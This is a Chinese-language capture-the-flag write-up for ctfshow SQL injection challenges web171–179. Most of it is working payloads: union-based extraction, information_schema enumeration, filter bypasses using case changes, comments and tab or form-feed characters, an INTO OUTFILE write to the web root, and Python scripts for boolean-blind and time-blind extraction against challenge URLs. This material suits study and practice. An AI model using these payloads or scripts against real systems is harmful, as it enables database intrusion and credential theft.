有点杂。。。
sql注入
web171-173
六件套往上呼
-
1’ order by 3 – -
-
1’ union select 1,2,database() – -
(无法用#进行注释,先用-- -) -
爆列名:1’union select 1,2,group_concat(column_name)from information_schema.columns where table_name=‘ctfshow_user’–+
-
查表:1’union select 1,2,group_concat(password)from ctfshow_user–+
-
1’union select 1,2,group_concat(password)from ctfshow_user–+
web174
这个比较有意思
先看题目
过滤了flag和数字并且区分大小写
解法一 用replacet套娃
这题的回显点只有两个。因为前面都一样,所以我们直接进行最后一步
1' union select 'q' (select replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','q'),'2','w'),'3','e'),'4','r'),'5','t'),'6','y'),'7','u'),'8','i'),'9','o'),'0','p') from ctfshow_user4 where username='flag'
我们可以看到有大小写字母,因为原来是先转为十六进制后,将数字变为小写
所以还要把小写字母转回数字。我们在数据库里转
最后进行十六进制转字符串
解法二,布尔盲注脚本
# @Author:Y4tacker
import requests
url = "http://e076200d-5e74-4121-b2fc-04153243f7a3.chall.ctf.show/api/v4.php?id=1' and "
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
payload = f'1=if(ascii(substr((select password from ctfshow_user4 limit 24,1),{i},1))>{mid},1,0) -- -'
r = requests.get(url + payload)
if "admin" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web 175
//检查结果是否有flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
解法一 时间盲注脚本
# @Author:Y4tacker
import requests
url = "http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/api/v5.php?id=1' and "
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
payload = f'1=if(ascii(substr((select password from ctfshow_user5 limit 24,1),{i},1))>{mid},sleep(2),0) -- -'
try:
r = requests.get(url + payload, timeout=0.5)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
解法二 利用读写文件写入网站根目录
http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/api/v5.php?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10
之后访问
http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/1.txt
web176 大小写过滤
解法一 万能密码出结果
解法二 大小写过滤
1' uNion Select 1,2,3--+
1' uNion Select 1,2,password from ctfshow_user--+
web177
空格过滤了/**/绕过
#用%23
1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user/**/where/**/username/**/='flag'%23
web178
过滤了空格与*号等用%09绕过
1'%09union%09select%091,2,password%09from%09ctfshow_user%23
web179
一句话,或者%0c代替%09
1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23